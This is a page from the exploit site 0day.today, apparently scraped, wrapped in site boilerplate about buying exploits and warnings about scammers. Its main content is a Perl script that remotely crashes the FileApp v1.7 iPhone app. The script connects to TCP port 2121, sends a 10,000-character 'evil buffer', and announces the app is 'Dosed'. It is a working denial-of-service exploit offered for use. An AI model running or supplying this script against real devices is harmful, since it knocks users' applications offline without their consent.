0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FileApp v1.7 for iPhone/iPod Remote DoS Exploit
=============================================== FileApp v1.7 for iPhone/iPod Remote DoS Exploit =============================================== #!/usr/bin/perl # # Exploit: FileApp - Remote Dos Exploit # Date: 17/02/10 # Author: Ale46 # Software Link: http://www.digidna.net/products/fileapp # Version: 1.7 # Tested on: Iphone 3GS with 3.1.2 firmware #Go in the sharing section of FileApp and run this script, the application crash and your Iphone\Ipod returns to the SpringBoard use IO::Socket; if (@ARGV<1){ print ("Usage: ./fileapp <server_ip>\n"); exit(); } my $host = $ARGV[0]; my $port = 2121; my $stuff = "A"*10000; my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port); unless ($socket) { die "Can\'t connect to $host" } print "Sending evil buffer..\n"; sleep(2); print $socket $stuff; sleep(1); print "Now your app is.. Dosed :D"; # 0day.today [2024-12-23] #